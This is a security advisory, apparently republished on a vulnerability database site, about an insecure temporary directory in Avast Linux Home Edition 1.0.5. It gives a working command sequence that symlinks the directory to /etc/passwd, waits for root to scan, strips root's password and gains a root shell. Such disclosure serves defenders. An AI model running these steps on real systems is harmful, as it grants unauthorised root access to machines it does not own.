Avast Linux Home Edition (vulnerability on a temporary folder creation)

2006.04.15
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-Other


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

Title : Avast Linux Home Edition, vulnerability on a temporary folder creation Protuct : Avast! Linux Home Edition Product : http://www.avast.com/eng/download-avast-for-linux-edition.html Version : 1.0.5, 1.0.5-1 avast4workstation-1.0.5-1.i586.rpm avast4workstation-1.0.5.tar.gz Vuln Found : 2006-04-14 (tested on RedHat Entreprise 4 Update 3). Introduction : -------------- Avast Linux Home Edition represents an antivirus solution for the Linux platform. When it scans for virus, it creates a temporary directory in /tmp in an insecure manner and gives it an chmod equal to 1777. Exploit : --------- $ ls -l /etc/passwd -rw-r--r-- 1 root root 1476 avr 14 15:30 /etc/passwd $ ln -s /etc/passwd /tmp/_avast4_ $ ll /tmp/_avast4_ lrwxrwxrwx 1 user user 11 avr 14 16:43 /tmp/_avast4_ -> /etc/passwd ... Waiting for user root to scan for virus (example: # avast -d /bin) ... $ ls -l /etc/passwd -rwxrwxrwt 1 root root 1476 avr 14 15:55 /etc/passwd (Oops!) $ sed s/^root:x:/root::/ /etc/passwd > /tmp/a.out $ cat /tmp/a.out > /etc/passwd $ su - # id uid=0(root) gid=0(root) groupes=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Note : ------ When the root user is launching avast for the first time, the "_avast4_" folder is not erased when virus scan is finished, so it may be difficult for a user to create the symbolic link. But we must not forget that distribs usualy clean there /tmp folder via the tmpwatch utility. Regards, Julian L. _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top